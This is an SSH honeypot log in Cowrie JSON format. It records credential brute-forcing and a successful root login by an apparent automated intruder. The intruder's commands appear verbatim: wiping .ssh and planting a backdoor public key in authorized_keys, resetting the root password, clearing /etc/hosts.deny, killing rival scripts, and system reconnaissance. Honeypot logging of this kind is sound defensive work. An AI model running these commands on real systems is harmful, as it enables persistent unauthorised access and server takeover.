{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42382,"dst_ip":"1.2.3.4","dst_port":22,"session":"999903081ad0","protocol":"ssh","message":"New connection: 212.227.235.229:42382 (1.2.3.4:22) [session: 999903081ad0]","sensor":"my-vps","timestamp":"2025-08-26T18:33:25.408716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:33:25.409590Z","src_ip":"212.227.235.229","session":"999903081ad0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:33:25.643294Z","src_ip":"212.227.235.229","session":"999903081ad0"}
{"eventid":"cowrie.login.failed","username":"test1","password":"1234567","message":"login attempt [test1/1234567] failed","sensor":"my-vps","timestamp":"2025-08-26T18:33:26.620731Z","src_ip":"212.227.235.229","session":"999903081ad0"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:33:27.857745Z","src_ip":"212.227.235.229","session":"999903081ad0"}
{"eventid":"cowrie.session.connect","src_ip":"114.35.197.70","src_port":51051,"dst_ip":"1.2.3.4","dst_port":23,"session":"a012dd28c76a","protocol":"telnet","message":"New connection: 114.35.197.70:51051 (1.2.3.4:23) [session: a012dd28c76a]","sensor":"my-vps","timestamp":"2025-08-26T18:35:26.357936Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44228,"dst_ip":"1.2.3.4","dst_port":22,"session":"328cba4f1bf9","protocol":"ssh","message":"New connection: 212.227.235.229:44228 (1.2.3.4:22) [session: 328cba4f1bf9]","sensor":"my-vps","timestamp":"2025-08-26T18:35:31.068834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:35:31.070516Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:35:32.000991Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd#123","message":"login attempt [root/P@ssw0rd#123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:35:32.982457Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:33.515766Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:35:33.516439Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:35:33.517486Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:33.753066Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:34.241994Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:35:34.242728Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:35:34.480060Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:34.481197Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35600,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa26345bdd19","protocol":"ssh","message":"New connection: 212.227.235.229:35600 (1.2.3.4:22) [session: fa26345bdd19]","sensor":"my-vps","timestamp":"2025-08-26T18:35:34.716751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:35:34.717746Z","src_ip":"212.227.235.229","session":"fa26345bdd19"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:35:34.953918Z","src_ip":"212.227.235.229","session":"fa26345bdd19"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T18:35:35.939991Z","src_ip":"212.227.235.229","session":"fa26345bdd19"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:37.179060Z","src_ip":"212.227.235.229","session":"fa26345bdd19"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:43.473455Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T18:35:43.474142Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:43.711186Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:44.202378Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"echo \"root:2c9bagar0h4I\"|chpasswd|bash","message":"CMD: echo \"root:2c9bagar0h4I\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T18:35:44.203207Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/63ca43b6a6d6289d6583a0e5d99a043980c0e200f24e39c1fa5e5d82f9e38995","size":21,"shasum":"63ca43b6a6d6289d6583a0e5d99a043980c0e200f24e39c1fa5e5d82f9e38995","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/63ca43b6a6d6289d6583a0e5d99a043980c0e200f24e39c1fa5e5d82f9e38995 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:44.438993Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:44.960810Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T18:35:44.961503Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T18:35:45.199459Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:45.200329Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:45.722812Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T18:35:45.723471Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:45.960000Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:46.456681Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T18:35:46.457482Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:46.694275Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:47.261662Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T18:35:47.262162Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T18:35:47.262578Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:47.500139Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:48.045114Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T18:35:48.045860Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:48.282330Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:48.773335Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T18:35:48.774346Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:49.011547Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:49.580864Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T18:35:49.581553Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:49.817688Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:50.307262Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T18:35:50.308090Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:50.544359Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:51.113873Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T18:35:51.114622Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:51.351223Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:51.882064Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T18:35:51.882769Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:52.119919Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:52.612962Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T18:35:52.613665Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:52.850565Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:53.433860Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T18:35:53.434721Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:53.671543Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:54.164896Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T18:35:54.165574Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:54.402295Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:35:54.975582Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
